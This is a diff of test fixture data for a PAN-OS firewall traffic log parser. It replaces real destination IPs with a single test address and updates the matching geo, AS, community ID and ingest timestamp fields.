@@ -12174,7 +12213,7 @@ }, "event": { "duration": 1000000000, - "ingested": "2021-09-08T12:38:09.284347036Z", + "ingested": "2021-12-09T13:43:22.382096200Z", "original": "Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,end,1,2012/04/10 04:39:49,192.168.0.2,192.168.0.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,24844,1,56995,53,0,0,0x200000,udp,allow,176,176,0,2,2012/04/10 04:39:18,1,any,0,0,0x0,192.168.0.0-192.168.255.255,192.168.0.0-192.168.255.255,0,2,0", "created": "2012-10-30T09:46:37.000-04:00", "timezone": "America/New_York", @@ -12198,24 +12237,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 209, + "number": 4837, "organization": { - "name": "CenturyLink Communications, LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 53, "bytes": 0, - "ip": "205.171.2.25", + "ip": "175.16.199.1", "packets": 0 }, "rule": { @@ -12234,7 +12275,7 @@ }, "packets": 1 }, - "message": "192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:49,26335,1,60989,53,0,0,0x200000,udp,allow,80,80,0,1,2012/04/10 04:39:49,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:49,26335,1,60989,53,0,0,0x200000,udp,allow,80,80,0,1,2012/04/10 04:39:49,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "panw": { "panos": { "ruleset": "rule1", 
@@ -12268,7 +12309,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:bIf8k1Z5+8sNSsr63qo8XknzQDo=", + "community_id": "1:8/nD/Ch9ioo4gep5hd7NtL/QOU0=", "transport": "udp", "application": "dns", "type": "ipv4", @@ -12306,14 +12347,14 @@ ], "ip": [ "192.168.0.2", - "205.171.2.25", + "175.16.199.1", "0.0.0.0" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:38:09.284351865Z", - "original": "Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,start,1,2012/04/10 04:39:49,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:49,26335,1,60989,53,0,0,0x200000,udp,allow,80,80,0,1,2012/04/10 04:39:49,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "ingested": "2021-12-09T13:43:22.382100100Z", + "original": "Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,start,1,2012/04/10 04:39:49,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:49,26335,1,60989,53,0,0,0x200000,udp,allow,80,80,0,1,2012/04/10 04:39:49,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:37.000-04:00", "timezone": "America/New_York", "kind": "event", 
@@ -12336,27 +12377,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-FL", - "city_name": "Fort Lauderdale", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Florida", + "region_name": "Jilin", "location": { - "lon": -80.1749, - "lat": 26.1792 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 27357, + "number": 4837, "organization": { - "name": "Rackspace Hosting" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, "bytes": 0, - "ip": "204.232.231.46", + "ip": "175.16.199.1", "packets": 0 }, "rule": { @@ -12375,7 +12415,7 @@ }, "packets": 1 }, - "message": "192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:49,26127,1,59280,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:48,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:49,26127,1,59280,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:48,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "panw": { "panos": { "ruleset": "rule1", @@ -12409,7 +12449,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:IRI0j5xLyLhwaONpy7gVZdl/Qow=", + "community_id": "1:qI6GZCcTdUKaf6uoJvk4RiEYMoc=", "transport": "tcp", "application": "web-browsing", "type": "ipv4", 
@@ -12447,14 +12487,14 @@ ], "ip": [ "192.168.0.2", - "204.232.231.46", + "175.16.199.1", "0.0.0.0" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:38:09.284356460Z", - "original": "Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,start,1,2012/04/10 04:39:48,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:49,26127,1,59280,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:48,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "ingested": "2021-12-09T13:43:22.382103400Z", + "original": "Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,start,1,2012/04/10 04:39:48,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:49,26127,1,59280,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:48,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:37.000-04:00", "timezone": "America/New_York", "kind": "event", @@ -12477,24 +12517,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 209, + "number": 4837, "organization": { - "name": "CenturyLink Communications, LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 53, "bytes": 0, - "ip": "205.171.2.25", + "ip": "175.16.199.1", "packets": 0 }, "rule": { 
@@ -12513,7 +12555,7 @@ }, "packets": 1 }, - "message": "192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:49,25488,1,53766,53,0,0,0x200000,udp,allow,81,81,0,1,2012/04/10 04:39:48,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:49,25488,1,53766,53,0,0,0x200000,udp,allow,81,81,0,1,2012/04/10 04:39:48,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "panw": { "panos": { "ruleset": "rule1", @@ -12547,7 +12589,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:VJaNvIgkNIXRerGHtYQC0HUPZh8=", + "community_id": "1:xc8jYe7XOXr51TL/mrR4hYixL24=", "transport": "udp", "application": "dns", "type": "ipv4", @@ -12585,14 +12627,14 @@ ], "ip": [ "192.168.0.2", - "205.171.2.25", + "175.16.199.1", "0.0.0.0" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:38:09.284361135Z", - "original": "Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,start,1,2012/04/10 04:39:48,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:49,25488,1,53766,53,0,0,0x200000,udp,allow,81,81,0,1,2012/04/10 04:39:48,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "ingested": "2021-12-09T13:43:22.382107500Z", + "original": "Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,start,1,2012/04/10 04:39:48,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:49,25488,1,53766,53,0,0,0x200000,udp,allow,81,81,0,1,2012/04/10 04:39:48,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:37.000-04:00", "timezone": "America/New_York", "kind": "event", 
@@ -12615,24 +12657,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 209, + "number": 4837, "organization": { - "name": "CenturyLink Communications, LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 53, "bytes": 0, - "ip": "205.171.2.25", + "ip": "175.16.199.1", "packets": 0 }, "rule": { @@ -12651,7 +12695,7 @@ }, "packets": 1 }, - "message": "192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:49,25269,1,56032,53,0,0,0x200000,udp,allow,81,81,0,1,2012/04/10 04:39:48,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:49,25269,1,56032,53,0,0,0x200000,udp,allow,81,81,0,1,2012/04/10 04:39:48,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "panw": { "panos": { "ruleset": "rule1", @@ -12685,7 +12729,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:fMeKYeqX7mnB812D1vOtHs7BRO4=", + "community_id": "1:BbIogVNBViw8uF7WHTsnoLjNl5s=", "transport": "udp", "application": "dns", "type": "ipv4", 
@@ -12723,14 +12767,14 @@ ], "ip": [ "192.168.0.2", - "205.171.2.25", + "175.16.199.1", "0.0.0.0" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:38:09.284370026Z", - "original": "Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,start,1,2012/04/10 04:39:48,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:49,25269,1,56032,53,0,0,0x200000,udp,allow,81,81,0,1,2012/04/10 04:39:48,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "ingested": "2021-12-09T13:43:22.382113200Z", + "original": "Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,start,1,2012/04/10 04:39:48,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:49,25269,1,56032,53,0,0,0x200000,udp,allow,81,81,0,1,2012/04/10 04:39:48,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:37.000-04:00", "timezone": "America/New_York", "kind": "event", @@ -12753,24 +12797,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "Europe", - "country_name": "Italy", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "Italy", + "region_name": "Jilin", "location": { - "lon": 12.1097, - "lat": 43.1479 - }, - "country_iso_code": "IT" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 3269, + "number": 4837, "organization": { - "name": "Telecom Italia" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, "bytes": 906, - "ip": "62.211.68.12", + "ip": "175.16.199.1", "packets": 7 }, "rule": { 
@@ -12789,7 +12835,7 @@ }, "packets": 6 }, - "message": "192.168.0.2,62.211.68.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,25715,1,59193,80,0,0,0x200000,tcp,allow,1487,581,906,13,2012/04/10 04:39:17,1,entertainment-and-arts,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,6,7", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,25715,1,59193,80,0,0,0x200000,tcp,allow,1487,581,906,13,2012/04/10 04:39:17,1,entertainment-and-arts,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,6,7", "panw": { "panos": { "ruleset": "rule1", @@ -12823,7 +12869,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:2482BoM8NEujTrlI4lp2vfAxmus=", + "community_id": "1:rG/AUdAraCxruLL9/yrSy2a3M3c=", "transport": "tcp", "application": "web-browsing", "type": "ipv4", 
@@ -12861,14 +12907,14 @@ ], "ip": [ "192.168.0.2", - "62.211.68.12", + "175.16.199.1", "0.0.0.0" ] }, "event": { "duration": 1000000000, - "ingested": "2021-09-08T12:38:09.284376014Z", - "original": "Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,end,1,2012/04/10 04:39:48,192.168.0.2,62.211.68.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,25715,1,59193,80,0,0,0x200000,tcp,allow,1487,581,906,13,2012/04/10 04:39:17,1,entertainment-and-arts,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,6,7", + "ingested": "2021-12-09T13:43:22.382118600Z", + "original": "Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,end,1,2012/04/10 04:39:48,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,25715,1,59193,80,0,0,0x200000,tcp,allow,1487,581,906,13,2012/04/10 04:39:17,1,entertainment-and-arts,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,6,7", "created": "2012-10-30T09:46:37.000-04:00", "timezone": "America/New_York", "kind": "event", @@ -12891,27 +12937,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-FL", - "city_name": "Fort Lauderdale", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Florida", + "region_name": "Jilin", "location": { - "lon": -80.1749, - "lat": 26.1792 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 27357, + "number": 4837, "organization": { - "name": "Rackspace Hosting" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, "bytes": 0, - "ip": "204.232.231.46", + "ip": "175.16.199.1", "packets": 0 }, "rule": { 
@@ -12930,7 +12975,7 @@ }, "packets": 1 }, - "message": "192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,26251,1,59279,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:48,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,26251,1,59279,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:48,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "panw": { "panos": { "ruleset": "rule1", @@ -12964,7 +13009,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:FmIwID3HJ4Q0574SjlhMHApz/Hs=", + "community_id": "1:zCXr7ZHueb4XQvihT/RtgRKe8VI=", "transport": "tcp", "application": "web-browsing", "type": "ipv4", @@ -13002,14 +13047,14 @@ ], "ip": [ "192.168.0.2", - "204.232.231.46", + "175.16.199.1", "0.0.0.0" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:38:09.284380602Z", - "original": "Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,TRAFFIC,start,1,2012/04/10 04:39:48,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,26251,1,59279,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:48,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "ingested": "2021-12-09T13:43:22.382123900Z", + "original": "Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,TRAFFIC,start,1,2012/04/10 04:39:48,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,26251,1,59279,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:48,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:42.000-04:00", "timezone": "America/New_York", "kind": "event", 
@@ -13032,27 +13077,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-FL", - "city_name": "Fort Lauderdale", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Florida", + "region_name": "Jilin", "location": { - "lon": -80.1749, - "lat": 26.1792 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 27357, + "number": 4837, "organization": { - "name": "Rackspace Hosting" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, "bytes": 0, - "ip": "204.232.231.46", + "ip": "175.16.199.1", "packets": 0 }, "rule": { @@ -13071,7 +13115,7 @@ }, "packets": 1 }, - "message": "192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,25871,1,59278,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:48,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,25871,1,59278,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:48,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "panw": { "panos": { "ruleset": "rule1", @@ -13105,7 +13149,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:WiUImNtgjkeNDi1Qigg7+Y6pDAg=", + "community_id": "1:06OCvk6jDtgpNZu7X72+H8dLeQ8=", "transport": "tcp", "application": "web-browsing", "type": "ipv4", 
@@ -13143,14 +13187,14 @@ ], "ip": [ "192.168.0.2", - "204.232.231.46", + "175.16.199.1", "0.0.0.0" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:38:09.284385335Z", - "original": "Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,TRAFFIC,start,1,2012/04/10 04:39:47,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,25871,1,59278,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:48,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "ingested": "2021-12-09T13:43:22.382129200Z", + "original": "Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,TRAFFIC,start,1,2012/04/10 04:39:47,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,25871,1,59278,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:48,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:42.000-04:00", "timezone": "America/New_York", "kind": "event", @@ -13173,27 +13217,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-FL", - "city_name": "Fort Lauderdale", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Florida", + "region_name": "Jilin", "location": { - "lon": -80.1749, - "lat": 26.1792 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 27357, + "number": 4837, "organization": { - "name": "Rackspace Hosting" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, "bytes": 0, - "ip": "204.232.231.46", + "ip": "175.16.199.1", "packets": 0 }, "rule": { 
@@ -13212,7 +13255,7 @@ }, "packets": 1 }, - "message": "192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,25945,1,59277,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:47,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,25945,1,59277,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:47,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "panw": { "panos": { "ruleset": "rule1", @@ -13246,7 +13289,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:/+Opb16c1ye6uLeu1/TNC+SGnYs=", + "community_id": "1:6PzwuKfF+39cTFyZytdFAhD4w44=", "transport": "tcp", "application": "web-browsing", "type": "ipv4", @@ -13284,14 +13327,14 @@ ], "ip": [ "192.168.0.2", - "204.232.231.46", + "175.16.199.1", "0.0.0.0" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:38:09.284389843Z", - "original": "Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,TRAFFIC,start,1,2012/04/10 04:39:47,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,25945,1,59277,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:47,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "ingested": "2021-12-09T13:43:22.382134600Z", + "original": "Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,TRAFFIC,start,1,2012/04/10 04:39:47,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,25945,1,59277,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:47,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:42.000-04:00", "timezone": "America/New_York", "kind": "event", 
@@ -13415,7 +13458,7 @@ }, "event": { "duration": 1000000000, - "ingested": "2021-09-08T12:38:09.284398842Z", + "ingested": "2021-12-09T13:43:22.382139900Z", "original": "Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,TRAFFIC,end,1,2012/04/10 04:39:47,192.168.0.2,192.168.0.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,25310,1,60026,53,0,0,0x200000,udp,allow,166,166,0,2,2012/04/10 04:39:16,1,any,0,0,0x0,192.168.0.0-192.168.255.255,192.168.0.0-192.168.255.255,0,2,0", "created": "2012-10-30T09:46:42.000-04:00", "timezone": "America/New_York", @@ -13439,27 +13482,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-FL", - "city_name": "Fort Lauderdale", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Florida", + "region_name": "Jilin", "location": { - "lon": -80.1749, - "lat": 26.1792 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 27357, + "number": 4837, "organization": { - "name": "Rackspace Hosting" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, "bytes": 78, - "ip": "204.232.231.46", + "ip": "175.16.199.1", "packets": 1 }, "rule": { 
@@ -13478,7 +13520,7 @@ }, "packets": 3 }, - "message": "192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:47,27111,1,59276,80,0,0,0x200000,tcp,allow,429,351,78,4,2012/04/10 04:39:47,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,3,1", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:47,27111,1,59276,80,0,0,0x200000,tcp,allow,429,351,78,4,2012/04/10 04:39:47,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,3,1", "panw": { "panos": { "ruleset": "rule1", @@ -13512,7 +13554,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:uslltTePy/m8Gxhk/MgPbZfk6Rg=", + "community_id": "1:vRVo2Gp1oNRBcvj5NtWtblslqFk=", "transport": "tcp", "application": "web-browsing", "type": "ipv4", @@ -13550,14 +13592,14 @@ ], "ip": [ "192.168.0.2", - "204.232.231.46", + "175.16.199.1", "0.0.0.0" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:38:09.284404508Z", - "original": "Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,TRAFFIC,start,1,2012/04/10 04:39:47,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:47,27111,1,59276,80,0,0,0x200000,tcp,allow,429,351,78,4,2012/04/10 04:39:47,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,3,1", + "ingested": "2021-12-09T13:43:22.382145100Z", + "original": "Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,TRAFFIC,start,1,2012/04/10 04:39:47,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:47,27111,1,59276,80,0,0,0x200000,tcp,allow,429,351,78,4,2012/04/10 04:39:47,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,3,1", "created": "2012-10-30T09:46:42.000-04:00", "timezone": "America/New_York", "kind": "event", 
@@ -13580,27 +13622,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-FL", - "city_name": "Fort Lauderdale", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Florida", + "region_name": "Jilin", "location": { - "lon": -80.1749, - "lat": 26.1792 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 27357, + "number": 4837, "organization": { - "name": "Rackspace Hosting" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, "bytes": 78, - "ip": "204.232.231.46", + "ip": "175.16.199.1", "packets": 1 }, "rule": { @@ -13619,7 +13660,7 @@ }, "packets": 3 }, - "message": 